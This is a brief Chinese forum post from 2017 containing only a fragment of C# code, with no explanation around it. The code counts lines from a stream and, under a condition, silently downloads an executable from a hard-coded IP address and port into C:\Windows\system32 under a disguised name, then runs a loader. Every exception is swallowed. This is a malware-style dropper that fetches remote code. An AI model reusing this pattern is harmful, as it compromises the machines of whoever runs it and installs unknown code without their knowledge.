|  | 
 
 发表于 2017-2-9 08:52:40
|
显示全部楼层 
| StreamReader reader2 = new StreamReader(output, Encoding.Default); string str6 = reader2.ReadLine();
 int num3 = 0;
 while (str6 != null)
 {
 num3++;
 str6 = reader2.ReadLine();
 }
 reader2.Close();
 if (num3 >= 2)
 {
 this.DownloadFile("http://60.174.234.107:1974/c.exe ", @"C:\Windows\system32\icls.exe");
 this.Yyes_Load();
 }
 }
 catch (Exception)
 {
 }
 | 
 |